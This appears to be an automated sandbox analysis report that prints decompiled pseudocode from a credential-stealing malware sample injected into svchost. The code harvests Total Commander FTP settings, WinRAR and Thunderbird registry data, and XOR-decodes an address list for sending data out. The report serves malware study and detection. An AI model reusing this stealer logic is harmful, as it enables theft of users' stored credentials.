                                                                                                                                        • API ID: CloseEnumOpen
                                                                                                                                        • String ID: FSProtocol$HostName$Password$PortNumber$RemoteDirectory$UserName
                                                                                                                                        • API String ID: 1332880857-3874328862
                                                                                                                                        • Opcode ID: cc475e273ce474d4b1fc27d3aab242bb528d2ddde4654feef402817de87d86d6
                                                                                                                                        • Instruction ID: 0dba3c37e7fd98be62edc1055bf2c71f5a5a4c57ea406983558d7b88087071e2
                                                                                                                                        • Opcode Fuzzy Hash: cc475e273ce474d4b1fc27d3aab242bb528d2ddde4654feef402817de87d86d6
                                                                                                                                        • Instruction Fuzzy Hash: D3610F70921228DECF61AF54CC41ADEBAF9FF04650F00C5E5E599A2290DE315A94DFE1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 12.89%

                                                                                                                                        Function 0BC0441F, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 183memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                        			E0BC0441F(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __esi;
				intOrPtr _t16;
				CHAR* _t17;
				int _t18;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t26;
				intOrPtr _t29;
				void* _t31;
				void* _t34;
				void* _t35;
				intOrPtr _t37;
				void* _t38;
				void* _t40;
				void* _t65;
				void* _t66;
				void* _t67;
				long _t70;
				void* _t81;
				intOrPtr* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				void* _t87;

				_push(__ecx);
				_push(__ecx);
				_t59 = _a4;
				_t64 = _a4;
				_t16 = E0BC08C9C(_a4, __edx, __eflags, 2);
				 *_t83 = 0x185;
				_v12 = _t16;
				_t17 = LocalAlloc(0x40, _t70);
				_t71 = _t17;
				_t18 = GetWindowsDirectoryA(_t17, 0x104);
				if(_t18 == 0 || _t18 > 0x104) {
					E0BC08D3D(_t71);
				} else {
					E0BC042C9(_t64, _t59, _t71); // executed
				}
				_pop(_t65);
				_t20 = E0BC091BE(0x28); // executed
				E0BC042C9(_t65, _t59, _t20); // executed
				_t22 = E0BC091BE(0x1a);
				_t84 = _t83 + 0x10;
				_t77 = "\\GHISLER";
				if(_t22 != 0) {
					E0BC042C9(_t65, _t59, E0BC08F32(_t22, "\\GHISLER")); // executed
					_t84 = _t84 + 0x10;
				}
				_t23 = E0BC091BE(0x23);
				_pop(_t66);
				if(_t23 != 0) {
					E0BC042C9(_t66, _t59, E0BC08F32(_t23, _t77)); // executed
					_t84 = _t84 + 0x10;
				}
				_t24 = E0BC091BE(0x1c);
				_pop(_t67);
				if(_t24 != 0) {
					E0BC042C9(_t67, _t59, E0BC08F32(_t24, _t77)); // executed
					_t84 = _t84 + 0x10;
				}
				_t72 = "InstallDir";
				_t26 = E0BC08EBD(0x80000001, "Software\\Ghisler\\Windows Commander", "InstallDir", 0); // executed
				E0BC042C9(_t67, _t59, _t26);
				_t60 = "FtpIniName";
				_t29 = E0BC08EBD(0x80000001, "Software\\Ghisler\\Windows Commander", "FtpIniName", 0); // executed
				_t85 = _t84 + 0x20;
				_v8 = _t29;
				if(_t29 != 0) {
					E0BC042B1(_a4, _t29);
					E0BC08D3D(_v8);
					_t85 = _t85 + 0xc;
				}
				_t31 = E0BC08EBD(0x80000001, "Software\\Ghisler\\Total Commander", _t72, 0); // executed
				E0BC042C9(_t67, _a4, _t31);
				_t34 = E0BC08EBD(0x80000001, "Software\\Ghisler\\Total Commander", _t60, 0); // executed
				_t79 = _t34;
				_t86 = _t85 + 0x20;
				if(_t34 != 0) {
					E0BC042B1(_a4, _t79);
					E0BC08D3D(_t79);
					_t86 = _t86 + 0xc;
				}
				_t35 = E0BC08DDA(0x80000002, 0x80000002, "Software\\Ghisler\\Windows Commander", _t72, 0, 0); // executed
				E0BC042C9(_t67, _a4, _t35);
				_t37 = E0BC08DDA(0x80000002, 0x80000002, "Software\\Ghisler\\Windows Commander", _t60, 0, 0); // executed
				_t87 = _t86 + 0x30;
				_v8 = _t37;
				if(_t37 != 0) {
					E0BC042B1(_a4, _t37);
					E0BC08D3D(_v8);
					_t87 = _t87 + 0xc;
				}
				_t38 = E0BC08DDA(0x80000002, 0x80000002, "Software\\Ghisler\\Total Commander", _t72, 0, 0); // executed
				E0BC042C9(_t67, _a4, _t38);
				_t40 = E0BC08DDA(0x80000002, 0x80000002, "Software\\Ghisler\\Total Commander", _t60, 0, 0); // executed
				_t81 = _t40;
				_t99 = _t81;
				if(_t81 != 0) {
					E0BC042B1(_a4, _t81);
					E0BC08D3D(_t81);
				}
				return E0BC08D0C(_a4, _v12, _t99);
			}
































                                                                                                                                        0x0bc04422
                                                                                                                                        0x0bc04423
                                                                                                                                        0x0bc04425
                                                                                                                                        0x0bc0442c
                                                                                                                                        0x0bc0442e
                                                                                                                                        0x0bc04433
                                                                                                                                        0x0bc0443c
                                                                                                                                        0x0bc0443f
                                                                                                                                        0x0bc0444a
                                                                                                                                        0x0bc0444e
                                                                                                                                        0x0bc04456
                                                                                                                                        0x0bc04467
                                                                                                                                        0x0bc0445c
                                                                                                                                        0x0bc0445e
                                                                                                                                        0x0bc04463
                                                                                                                                        0x0bc0446c
                                                                                                                                        0x0bc0446f
                                                                                                                                        0x0bc04476
                                                                                                                                        0x0bc0447d
                                                                                                                                        0x0bc04482
                                                                                                                                        0x0bc04485
                                                                                                                                        0x0bc0448c
                                                                                                                                        0x0bc04497
                                                                                                                                        0x0bc0449c
                                                                                                                                        0x0bc0449c
                                                                                                                                        0x0bc044a1
                                                                                                                                        0x0bc044a6
                                                                                                                                        0x0bc044a9
                                                                                                                                        0x0bc044b4
                                                                                                                                        0x0bc044b9
                                                                                                                                        0x0bc044b9
                                                                                                                                        0x0bc044be
                                                                                                                                        0x0bc044c3
                                                                                                                                        0x0bc044c6
                                                                                                                                        0x0bc044d1
                                                                                                                                        0x0bc044d6
                                                                                                                                        0x0bc044d6
                                                                                                                                        0x0bc044db
                                                                                                                                        0x0bc044ed
                                                                                                                                        0x0bc044f4
                                                                                                                                        0x0bc044fb
                                                                                                                                        0x0bc04508
                                                                                                                                        0x0bc0450d
                                                                                                                                        0x0bc04510
                                                                                                                                        0x0bc04515
                                                                                                                                        0x0bc0451b
                                                                                                                                        0x0bc04523
                                                                                                                                        0x0bc04528
                                                                                                                                        0x0bc04528
                                                                                                                                        0x0bc04535
                                                                                                                                        0x0bc0453e
                                                                                                                                        0x0bc0454d
                                                                                                                                        0x0bc04552
                                                                                                                                        0x0bc04554
                                                                                                                                        0x0bc04559
                                                                                                                                        0x0bc0455f
                                                                                                                                        0x0bc04565
                                                                                                                                        0x0bc0456a
                                                                                                                                        0x0bc0456a
                                                                                                                                        0x0bc0457d
                                                                                                                                        0x0bc04586
                                                                                                                                        0x0bc04596
                                                                                                                                        0x0bc0459b
                                                                                                                                        0x0bc0459e
                                                                                                                                        0x0bc045a3
                                                                                                                                        0x0bc045a9
                                                                                                                                        0x0bc045b1
                                                                                                                                        0x0bc045b6
                                                                                                                                        0x0bc045b6
                                                                                                                                        0x0bc045c5
                                                                                                                                        0x0bc045ce
                                                                                                                                        0x0bc045da
                                                                                                                                        0x0bc045df
                                                                                                                                        0x0bc045e4
                                                                                                                                        0x0bc045e6
                                                                                                                                        0x0bc045ec
                                                                                                                                        0x0bc045f2
                                                                                                                                        0x0bc045f7
                                                                                                                                        0x0bc04609

                                                                                                                                        APIs
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000002), ref: 0BC0443F
                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 0BC0444E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocDirectoryLocalWindows
                                                                                                                                        • String ID: FtpIniName$InstallDir$Software\Ghisler\Total Commander$Software\Ghisler\Windows Commander$\GHISLER
                                                                                                                                        • API String ID: 3186838798-3636168975
                                                                                                                                        • Opcode ID: f581d20579595f867798c103eeeeeae1100bec8776cd730423ee736f86d11e92
                                                                                                                                        • Instruction ID: 9d5b5651ce8c2ee33801ce76a997941d73e6297f60b8cfd11730c92acb66ef4e
                                                                                                                                        • Opcode Fuzzy Hash: f581d20579595f867798c103eeeeeae1100bec8776cd730423ee736f86d11e92
                                                                                                                                        • Instruction Fuzzy Hash: 0D41D1B1B713113EEA1537A08C47FAF296D8F61B91F008524BF05BA2C1EEB58E41A5F1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.18%

                                                                                                                                        Function 0BC099B0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 98COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                        			E0BC099B0(intOrPtr* __ebx, void* __edx) {
				signed int _v8;
				char _v272;
				void* _v276;
				intOrPtr _v280;
				void* _v284;
				intOrPtr _v288;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t21;
				intOrPtr _t22;
				long _t26;
				void* _t28;
				intOrPtr _t31;
				void* _t32;
				intOrPtr* _t34;
				void** _t38;
				void* _t39;
				intOrPtr* _t46;
				void* _t51;
				void* _t54;
				void* _t56;
				CHAR* _t58;
				intOrPtr _t59;
				signed int _t60;

				_t54 = __edx;
				_t46 = __ebx;
				_t19 =  *0xbc10000; // 0xbb40e64e
				_v8 = _t19 ^ _t60;
				_t21 =  *0xbc10010; // 0x80000001
				_t55 = "HWID";
				_t22 = E0BC08EBD(_t21, "Software\\WinRAR", "HWID", __ebx); // executed
				_v288 = _t22;
				if(_t22 != 0) {
					L14:
					return E0BC09FDC(_v288, _t46, _v8 ^ _t60, _t54, _t55, _t56);
				}
				_push(_t56);
				_t26 = GetTempPathA(0x104,  &_v272);
				if(_t26 == 0 || _t26 > 0x104) {
					L13:
					_pop(_t56);
					goto L14;
				} else {
					__imp__CreateStreamOnHGlobal(0, 1,  &_v276);
					_t58 =  &_v272;
					_t28 = E0BC08F95(_t58);
					_push(_t58);
					if(_t28 != 0) {
						_t31 = E0BC08EE2("HWID");
					} else {
						_t31 = E0BC08F32(E0BC08EE2("//"), "HWID");
					}
					_v280 = _t31;
					_t32 = E0BC08A86(_t46, _v276, _t54, _t31);
					_pop(_t51);
					if(_t32 != 0) {
						_t59 = E0BC089A1(_v276, _t51);
						if(_t59 != 0) {
							_t38 =  &_v284;
							__imp__GetHGlobalFromStream(_v276, _t38);
							if(_t38 >= 0) {
								_t39 = GlobalLock(_v284);
								_t55 = _t39;
								if(_t39 != 0) {
									_v288 = E0BC08D51(_t59);
									E0BC08D91(_t55, _t41, _t59);
									GlobalUnlock(_v284);
									 *_t46 = _t59;
								}
							}
						}
					}
					E0BC08D3D(_v280);
					_t34 = _v276;
					if(_t34 != 0) {
						 *((intOrPtr*)( *_t34 + 8))(_t34);
					}
					goto L13;
				}
			}




























                                                                                                                                        0x0bc099b0
                                                                                                                                        0x0bc099b0
                                                                                                                                        0x0bc099b9
                                                                                                                                        0x0bc099c0
                                                                                                                                        0x0bc099c3
                                                                                                                                        0x0bc099ca
                                                                                                                                        0x0bc099d5
                                                                                                                                        0x0bc099dd
                                                                                                                                        0x0bc099e5
                                                                                                                                        0x0bc09ae1
                                                                                                                                        0x0bc09af3
                                                                                                                                        0x0bc09af3
                                                                                                                                        0x0bc099eb
                                                                                                                                        0x0bc099f9
                                                                                                                                        0x0bc09a01
                                                                                                                                        0x0bc09ae0
                                                                                                                                        0x0bc09ae0
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc09a0f
                                                                                                                                        0x0bc09a1a
                                                                                                                                        0x0bc09a20
                                                                                                                                        0x0bc09a26
                                                                                                                                        0x0bc09a2f
                                                                                                                                        0x0bc09a30
                                                                                                                                        0x0bc09a4a
                                                                                                                                        0x0bc09a32
                                                                                                                                        0x0bc09a3e
                                                                                                                                        0x0bc09a43
                                                                                                                                        0x0bc09a57
                                                                                                                                        0x0bc09a5d
                                                                                                                                        0x0bc09a62
                                                                                                                                        0x0bc09a65
                                                                                                                                        0x0bc09a72
                                                                                                                                        0x0bc09a76
                                                                                                                                        0x0bc09a78
                                                                                                                                        0x0bc09a85
                                                                                                                                        0x0bc09a8d
                                                                                                                                        0x0bc09a95
                                                                                                                                        0x0bc09a9b
                                                                                                                                        0x0bc09a9f
                                                                                                                                        0x0bc09aab
                                                                                                                                        0x0bc09ab1
                                                                                                                                        0x0bc09abc
                                                                                                                                        0x0bc09ac2
                                                                                                                                        0x0bc09ac2
                                                                                                                                        0x0bc09a9f
                                                                                                                                        0x0bc09a8d
                                                                                                                                        0x0bc09a76
                                                                                                                                        0x0bc09aca
                                                                                                                                        0x0bc09acf
                                                                                                                                        0x0bc09ad8
                                                                                                                                        0x0bc09add
                                                                                                                                        0x0bc09add
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc09ad8

                                                                                                                                        APIs
                                                                                                                                        • GetTempPathA.KERNEL32(00000104,?,00000000,?,?,?), ref: 0BC099F9
                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?), ref: 0BC09A1A
                                                                                                                                          • Part of subcall function 0BC08F95: lstrlenA.KERNEL32(?,0BC09A2B,?,?,?), ref: 0BC08F9F
                                                                                                                                        • GetHGlobalFromStream.OLE32(?,?,?,?,?), ref: 0BC09A85
                                                                                                                                        • GlobalLock.KERNEL32 ref: 0BC09A95
                                                                                                                                        • GlobalUnlock.KERNEL32(?,00000000,00000000,00000000,?,?,?), ref: 0BC09ABC
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrlenA.KERNEL32(00000000,HWID,?,?), ref: 0BC08F07
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrlenA.KERNEL32(HWID), ref: 0BC08F0C
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrcpyA.KERNEL32(00000000,00000000), ref: 0BC08F1D
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrcatA.KERNEL32(00000000,HWID), ref: 0BC08F25
                                                                                                                                          • Part of subcall function 0BC08F32: lstrlenA.KERNEL32(00000000,HWID,?,?,?,0BC09A43), ref: 0BC08F58
                                                                                                                                          • Part of subcall function 0BC08F32: lstrlenA.KERNEL32(00000000,?,0BC09A43), ref: 0BC08F5F
                                                                                                                                          • Part of subcall function 0BC08F32: lstrcpyA.KERNEL32(00000000,00000000,?,0BC09A43), ref: 0BC08F70
                                                                                                                                          • Part of subcall function 0BC08F32: lstrcatA.KERNEL32(00000000,00000000,?,0BC09A43), ref: 0BC08F7A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$Global$Streamlstrcatlstrcpy$CreateFromLockPathTempUnlock
                                                                                                                                        • String ID: HWID$Software\WinRAR
                                                                                                                                        • API String ID: 4065236511-3334689248
                                                                                                                                        • Opcode ID: 7c2315638ea35df90035e141b3820e9b568c52b040351f45abc37a76d879729e
                                                                                                                                        • Instruction ID: ecb0298cdaff28f65b60e7f48c18ee53045aed45977dfab0fc6a63362085cb30
                                                                                                                                        • Opcode Fuzzy Hash: 7c2315638ea35df90035e141b3820e9b568c52b040351f45abc37a76d879729e
                                                                                                                                        • Instruction Fuzzy Hash: 1D318071A301299BCB25EB68DC46BDA77F9AF49700F0445A5E509E71C0DEB0CE80EFA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.23%

                                                                                                                                        Function 0BC06E59, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 73COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 97%
                                                                                                                                        			E0BC06E59(void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				void* _t40;
				signed int _t43;

				_t49 = __eflags;
				_t16 =  *0xbc10000; // 0xbb40e64e
				_v8 = _t16 ^ _t43;
				_v280 = _a4;
				_v284 = E0BC08C9C(_a4, _t40, __eflags, 0x5f);
				 *0xbc10d54 = 2;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t41 = "\\Thunderbird";
				_t34 = "Thunderbird";
				_t42 = "Software\\Mozilla";
				E0BC0689E(_t40, _v280, 0x80000001, "Software\\Mozilla", "Thunderbird", "\\Thunderbird"); // executed
				E0BC0689E(_t40, _v280, 0x80000002, "Software\\Mozilla", "Thunderbird", "\\Thunderbird"); // executed
				SetCurrentDirectoryA( &_v276);
				 *0xbc10d54 = 3;
				GetCurrentDirectoryA(0x104,  &_v276);
				E0BC0689E(_t40, _v280, 0x80000001, _t42, _t34, _t41); // executed
				E0BC0689E(_t40, _v280, 0x80000002, _t42, _t34, _t41); // executed
				SetCurrentDirectoryA( &_v276);
				return E0BC09FDC(E0BC08D0C(_v280, _v284, _t49), _v284, _v8 ^ _t43, _t40, _t41, _t42);
			}













                                                                                                                                        0x0bc06e59
                                                                                                                                        0x0bc06e62
                                                                                                                                        0x0bc06e69
                                                                                                                                        0x0bc06e74
                                                                                                                                        0x0bc06e80
                                                                                                                                        0x0bc06e92
                                                                                                                                        0x0bc06e9c
                                                                                                                                        0x0bc06ea2
                                                                                                                                        0x0bc06ea8
                                                                                                                                        0x0bc06eae
                                                                                                                                        0x0bc06ebf
                                                                                                                                        0x0bc06ed5
                                                                                                                                        0x0bc06ee4
                                                                                                                                        0x0bc06ef6
                                                                                                                                        0x0bc06f00
                                                                                                                                        0x0bc06f14
                                                                                                                                        0x0bc06f2a
                                                                                                                                        0x0bc06f39
                                                                                                                                        0x0bc06f5e

                                                                                                                                        APIs
                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0BC06E9C
                                                                                                                                          • Part of subcall function 0BC0689E: StrStrIA.SHLWAPI(?,?), ref: 0BC068B0
                                                                                                                                          • Part of subcall function 0BC0689E: LocalAlloc.KERNEL32(00000040,00000880), ref: 0BC06928
                                                                                                                                          • Part of subcall function 0BC0689E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 0BC0693D
                                                                                                                                          • Part of subcall function 0BC0689E: RegEnumKeyExA.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0BC069C2
                                                                                                                                          • Part of subcall function 0BC0689E: RegCloseKey.KERNELBASE(?), ref: 0BC069CC
                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?), ref: 0BC06EE4
                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0BC06F00
                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?), ref: 0BC06F39
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectory$AllocCloseEnumLocalOpen
                                                                                                                                        • String ID: Software\Mozilla$Thunderbird$\Thunderbird
                                                                                                                                        • API String ID: 763207988-138716004
                                                                                                                                        • Opcode ID: 251bf2fb4ba5df433b19c9b169f52eb32d41e96274c08cb764b07ff3fe951c08
                                                                                                                                        • Instruction ID: 7fca3ecff15df8cf28386c3d5cea13775a3f5ce74b388604fd50f58f6b846da5
                                                                                                                                        • Opcode Fuzzy Hash: 251bf2fb4ba5df433b19c9b169f52eb32d41e96274c08cb764b07ff3fe951c08
                                                                                                                                        • Instruction Fuzzy Hash: 39217CB1D2111CABDB24EB14DC4BFDB7BBCEB45705F4005A8B60AA2181DA709E94CBB1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.10%

                                                                                                                                        Function 0BC01153, Relevance: 12.2, APIs: 8, Instructions: 200sleepmemorynetworkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                        			E0BC01153(signed char __edx) {
				signed int _v8;
				char _v412;
				void* _v416;
				void* _v420;
				void* _v424;
				intOrPtr _v428;
				void* _v432;
				void* _v436;
				intOrPtr _v440;
				void* _v444;
				intOrPtr _v448;
				char _v460;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t70;
				void* _t73;
				void* _t78;
				intOrPtr* _t79;
				void* _t84;
				intOrPtr* _t88;
				intOrPtr _t90;
				void* _t95;
				intOrPtr _t99;
				intOrPtr _t102;
				void* _t104;
				signed int _t114;
				void* _t115;
				signed char _t118;
				void* _t119;
				signed char* _t131;
				signed char _t132;
				intOrPtr _t133;
				intOrPtr* _t134;
				signed int _t136;
				void* _t137;
				void* _t138;

				_t132 = __edx;
				_t70 =  *0xbc10000; // 0xbb40e64e
				_v8 = _t70 ^ _t136;
				_t115 = 0;
				_v432 = 0;
				_v436 = 0;
				__imp__#115(0x101,  &_v412); // executed
				_t73 = LocalAlloc(0x40, 0x8c);
				 *0xbc10d68 = _t73;
				 *(_t73 + 4) = _t73;
				 *_t73 = _t73;
				E0BC08D5E( &_v460,  &_v460, 0, 0x30);
				_t134 = 0xbc108d0;
				_t138 =  *0xbc108d0 - _t115; // 0x25
				if(_t138 == 0) {
					L9:
					_t135 = __imp__CreateStreamOnHGlobal;
					 *_t135(_t115, 1,  &_v432); // executed
					_t119 = _v432;
					if(_t119 != _t115) {
						L11:
						_t135 = _t119; // executed
						_t78 = E0BC01431(_t119, _t132, _t142); // executed
						_t143 = _t78 - _t115;
						if(_t78 != _t115) {
							L14:
							if(_v460 == _t115) {
								L35:
								_t79 = _v432;
								__eflags = _t79 - _t115;
								if(_t79 != _t115) {
									 *((intOrPtr*)( *_t79 + 8))(_t79);
								}
								L37:
								__eflags = _v8 ^ _t136;
								return E0BC09FDC(_v436, _t115, _v8 ^ _t136, _t132, _t133, _t135);
							}
							_v420 =  &_v460;
							do {
								_v428 = 8;
								while(1) {
									_t84 = _v432;
									_v416 = _t115;
									_v440 = _t84;
									_v424 = _t115;
									if(_t84 == _t115) {
										goto L31;
									}
									L18:
									__imp__GetHGlobalFromStream(_t84,  &_v444);
									if(_t84 >= 0) {
										_t133 = E0BC089A1(_v440,  &_v444);
										_t95 = GlobalLock(_v444);
										_t135 = _t95;
										if(_t95 != _t115) {
											_v424 = _t115;
											_v416 = _t115;
											_t99 = E0BC01BF7( *_v420, _t135, _t133,  &_v416,  &_v424); // executed
											_t137 = _t137 + 0x14;
											if(_v424 != _t115) {
												_t102 = E0BC01BF7(_v424, _t135, _t133,  &_v416, _t115);
												_t137 = _t137 + 0x14;
												_v448 = _t102;
												E0BC08D3D(_v424);
												_t99 = _v448;
											}
											_v424 = _t99;
											GlobalUnlock(_v444);
										}
									}
									E0BC08B27(_v440);
									if(_v424 == _t115) {
										L28:
										_t88 = _v416;
										if(_t88 != _t115) {
											 *((intOrPtr*)( *_t88 + 8))(_t88);
										}
										if(_v436 != _t115) {
											L33:
											_v420 = _v420 + 4;
											__eflags = _v436 - _t115;
											if(_v436 != _t115) {
												goto L35;
											}
											break;
										} else {
											goto L31;
										}
									} else {
										if(_v416 == _t115) {
											goto L31;
										}
										_t90 = E0BC010D8(_t135, _v416);
										_v436 = _t90;
										if(_t90 == _t115 && E0BC0973A(_v416, _t132) != 0) {
											_v436 = E0BC010D8(_t135, _v416);
										}
										goto L28;
									}
									L31:
									if(_v428 == _t115) {
										goto L33;
									}
									_v428 = _v428 - 1;
									Sleep(0x2ee0);
									_t84 = _v432;
									_v416 = _t115;
									_v440 = _t84;
									_v424 = _t115;
									if(_t84 == _t115) {
										goto L31;
									}
									goto L18;
								}
								__eflags =  *_v420 - _t115;
							} while ( *_v420 != _t115);
							goto L35;
						}
						_t104 = E0BC01431(_t135, _t132, _t143);
						_t144 = _t104 - _t115;
						if(_t104 != _t115 || E0BC01431(_t135, _t132, _t144) != _t115) {
							goto L14;
						} else {
							goto L35;
						}
					}
					 *_t135(_t115, 1,  &_v432);
					_t119 = _v432;
					_t142 = _t119 - _t115;
					if(_t119 == _t115) {
						goto L37;
					}
					goto L11;
				} else {
					_v420 =  &_v460;
					do {
						_v428 =  *_t134;
						_t133 = E0BC08D51( *_t134);
						if(_t133 != _t115) {
							_t132 = 0;
							__eflags = _v428 - _t115;
							if(__eflags <= 0) {
								goto L8;
							}
							_t114 = _t134 - _t133;
							__eflags = _t114;
							do {
								_t131 = _t132 + _t133;
								_t13 =  &(_t131[4]); // 0x6065667b
								_t118 = _t13[_t114] ^ _t132 ^ 0x00000013;
								_t132 = _t132 + 1;
								 *_t131 = _t118;
								__eflags = _t132 - _v428;
							} while (_t132 < _v428);
							_t115 = 0;
							__eflags = 0;
						} else {
							_t133 = 0;
						}
						L8:
						_v420 = _v420 + 4;
						 *_v420 = _t133;
						_t19 =  *_t134 + 4; // 0x6065667b
						_t134 = _t134 + _t19;
					} while ( *_t134 != _t115);
					goto L9;
				}
			}








































                                                                                                                                        0x0bc01153
                                                                                                                                        0x0bc0115c
                                                                                                                                        0x0bc01163
                                                                                                                                        0x0bc01170
                                                                                                                                        0x0bc01177
                                                                                                                                        0x0bc0117d
                                                                                                                                        0x0bc01183
                                                                                                                                        0x0bc01190
                                                                                                                                        0x0bc01198
                                                                                                                                        0x0bc0119d
                                                                                                                                        0x0bc011a0
                                                                                                                                        0x0bc011aa
                                                                                                                                        0x0bc011af
                                                                                                                                        0x0bc011b4
                                                                                                                                        0x0bc011ba
                                                                                                                                        0x0bc0121f
                                                                                                                                        0x0bc0121f
                                                                                                                                        0x0bc0122f
                                                                                                                                        0x0bc01231
                                                                                                                                        0x0bc01239
                                                                                                                                        0x0bc01255
                                                                                                                                        0x0bc01255
                                                                                                                                        0x0bc01257
                                                                                                                                        0x0bc0125c
                                                                                                                                        0x0bc0125e
                                                                                                                                        0x0bc0127a
                                                                                                                                        0x0bc01280
                                                                                                                                        0x0bc0140c
                                                                                                                                        0x0bc0140c
                                                                                                                                        0x0bc01412
                                                                                                                                        0x0bc01414
                                                                                                                                        0x0bc01419
                                                                                                                                        0x0bc01419
                                                                                                                                        0x0bc0141c
                                                                                                                                        0x0bc01427
                                                                                                                                        0x0bc01430
                                                                                                                                        0x0bc01430
                                                                                                                                        0x0bc0128c
                                                                                                                                        0x0bc01292
                                                                                                                                        0x0bc01292
                                                                                                                                        0x0bc0129c
                                                                                                                                        0x0bc0129c
                                                                                                                                        0x0bc012a2
                                                                                                                                        0x0bc012a8
                                                                                                                                        0x0bc012ae
                                                                                                                                        0x0bc012b6
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc012bc
                                                                                                                                        0x0bc012c4
                                                                                                                                        0x0bc012cc
                                                                                                                                        0x0bc012e3
                                                                                                                                        0x0bc012e5
                                                                                                                                        0x0bc012eb
                                                                                                                                        0x0bc012ef
                                                                                                                                        0x0bc01309
                                                                                                                                        0x0bc0130f
                                                                                                                                        0x0bc01315
                                                                                                                                        0x0bc0131a
                                                                                                                                        0x0bc01323
                                                                                                                                        0x0bc01335
                                                                                                                                        0x0bc0133a
                                                                                                                                        0x0bc01343
                                                                                                                                        0x0bc01349
                                                                                                                                        0x0bc0134e
                                                                                                                                        0x0bc01354
                                                                                                                                        0x0bc0135b
                                                                                                                                        0x0bc01361
                                                                                                                                        0x0bc01361
                                                                                                                                        0x0bc012ef
                                                                                                                                        0x0bc0136d
                                                                                                                                        0x0bc01378
                                                                                                                                        0x0bc013b9
                                                                                                                                        0x0bc013b9
                                                                                                                                        0x0bc013c1
                                                                                                                                        0x0bc013c6
                                                                                                                                        0x0bc013c6
                                                                                                                                        0x0bc013cf
                                                                                                                                        0x0bc013ef
                                                                                                                                        0x0bc013ef
                                                                                                                                        0x0bc013f6
                                                                                                                                        0x0bc013fc
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0137a
                                                                                                                                        0x0bc01380
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc01388
                                                                                                                                        0x0bc0138e
                                                                                                                                        0x0bc01396
                                                                                                                                        0x0bc013b3
                                                                                                                                        0x0bc013b3
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc01396
                                                                                                                                        0x0bc013d1
                                                                                                                                        0x0bc013d7
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc013d9
                                                                                                                                        0x0bc013e4
                                                                                                                                        0x0bc0129c
                                                                                                                                        0x0bc012a2
                                                                                                                                        0x0bc012a8
                                                                                                                                        0x0bc012ae
                                                                                                                                        0x0bc012b6
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc012b6
                                                                                                                                        0x0bc01404
                                                                                                                                        0x0bc01404
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc01292
                                                                                                                                        0x0bc01262
